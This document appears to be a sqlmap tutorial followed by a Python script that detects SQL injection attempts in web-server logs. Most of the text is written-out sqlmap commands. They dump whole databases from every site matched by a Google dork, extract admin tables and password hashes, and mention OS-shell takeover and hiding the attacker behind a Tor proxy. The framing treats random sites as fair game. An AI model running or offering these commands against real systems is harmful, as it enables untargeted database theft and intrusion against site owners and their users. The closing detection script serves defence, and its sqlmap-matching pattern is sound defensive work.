This command will take a given Google dork and attempt to dump all available information from every result on the first page of Google.
python sqlmap.py --dump-all -g "inurl:prodID=3030"
Now this could come in handy when pentesting, because you could use Google dorks to focus in on the target and spider it for specific pages or just for more possible vulnerabilities. Or just use it for general dork fun. You can also choose a different page of Google results, as the default is the first page and those have probably already been owned. Also, so we can multitask and be notified when an SQL injection is found, we will add the --beep flag:
python sqlmap.py --dump-all -g "inurl:prodID=3030" --gpage 3 --beep
Another possibility when going after a specific target in a pentest is to do something like this:
python sqlmap.py -g "site:'hakhub.tk' inurl:'/prodID='" --current-user --passwords
You can also specify certain things to extract to save time, as I'm sure you'll see. To start off we will fingerprint the system to get an idea of what we're dealing with. Then we will find the databases and tables with verbosity and proceed to issue another command to extract the current user and password hashes.
python sqlmap.py -u www.example.com/shop/prodID=777 -f
If all's well, we'll proceed to issue the following commands; --batch automates the process (accepting the default answer to every prompt) and --eta shows us the estimated time:
python sqlmap.py -u www.example.com/shop/prodID=777 --dbs --tables -v 6 --batch --eta
python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB --tables --batch --eta
You can also brute force common table and column names with the --common-tables and --common-columns features, and play around with the OS takeover portion with --os-pwn (which utilizes Metasploit) and --os-shell.
Now we know the example database has a table named ex_admin, so we'll pull that table's columns.
python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump --batch --eta
If we wanted to do this via a proxy, you can use the --proxy flag as I will show you. We'll assume you've got Tor and Polipo up and running, with Polipo listening on its default port 8123.
python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump --batch --eta --proxy=http://127.0.0.1:8123
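Every command above hammers one numeric parameter (prodID) with many variant values, which is exactly what makes this activity stand out in a web server's access log. As an added example that is not part of the original post, this Python script parses constructed Apache combined-log lines and flags clients whose prodID values stop looking like product IDs or whose User-Agent advertises sqlmap (its default); the log lines, IPs and version string are made up for the demo.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log sample (not from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "GET /shop/?prodID=777 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:00:02 +0000] "GET /shop/?prodID=777%27 HTTP/1.1" 500 312 "-" "sqlmap/1.7"
203.0.113.5 - - [10/Mar/2024:12:00:02 +0000] "GET /shop/?prodID=777%20AND%201234%3D1234 HTTP/1.1" 200 5120 "-" "sqlmap/1.7"
203.0.113.5 - - [10/Mar/2024:12:00:03 +0000] "GET /shop/?prodID=777%20AND%201234%3D4321 HTTP/1.1" 200 4096 "-" "sqlmap/1.7"
198.51.100.9 - - [10/Mar/2024:12:00:05 +0000] "GET /shop/?prodID=42 HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""

# Combined log format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one combined-log line into a dict with decoded query params, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec

def analyze(log_text, param="prodID", expected=re.compile(r"\d+")):
    """Per client IP: requests whose `param` value is not a plain integer,
    whether the User-Agent mentioned sqlmap, and a few decoded sample values."""
    summary = defaultdict(lambda: {"anomalous": 0, "sqlmap_ua": False, "samples": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that are not in combined format
        entry = summary[rec["ip"]]
        if "sqlmap" in rec["ua"].lower():
            entry["sqlmap_ua"] = True
        for value in rec["params"].get(param, []):
            if not expected.fullmatch(value):  # e.g. 777' or 777 AND 1234=1234
                entry["anomalous"] += 1
                if len(entry["samples"]) < 3:
                    entry["samples"].append(value)
    return dict(summary)

def flagged(log_text, threshold=2):
    """IPs worth a closer look: sqlmap User-Agent or repeated malformed prodID values."""
    return sorted(ip for ip, e in analyze(log_text).items()
                  if e["sqlmap_ua"] or e["anomalous"] >= threshold)
```

The threshold on malformed values matters more than the User-Agent check, since the latter only catches a client that has not changed the default string; the same parse-then-aggregate approach extends to any parameter your application expects to be a fixed type.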